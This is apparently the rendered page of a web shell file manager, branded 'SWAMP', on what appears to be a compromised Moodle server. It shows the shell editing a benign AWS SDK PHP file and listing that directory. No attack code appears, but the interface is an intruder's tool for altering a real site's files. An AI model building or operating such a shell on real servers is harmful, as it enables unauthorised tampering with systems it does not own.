░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/moodle/public/lib/aws-sdk/src/Identity
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: BearerTokenIdentity.php
<?php namespace Aws\Identity; /** * Denotes the use of Bearer Token credentials. * * @internal */ abstract class BearerTokenIdentity implements IdentityInterface { /** * Returns a UNIX timestamp, if available, representing the expiration * time of the Bearer Token object. Returns null if no expiration is provided. * * @return int|null */ abstract public function getExpiration(); }
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📁 S3/
DIR
—
2026-02-11 01:44
📄 AwsCredentialIdentity.php
PHP
427 B
2026-02-11 01:44
EDIT
📄 BearerTokenIdentity.php
PHP
423 B
2026-02-11 01:44
EDIT
📄 IdentityInterface.php
PHP
499 B
2026-02-11 01:44
EDIT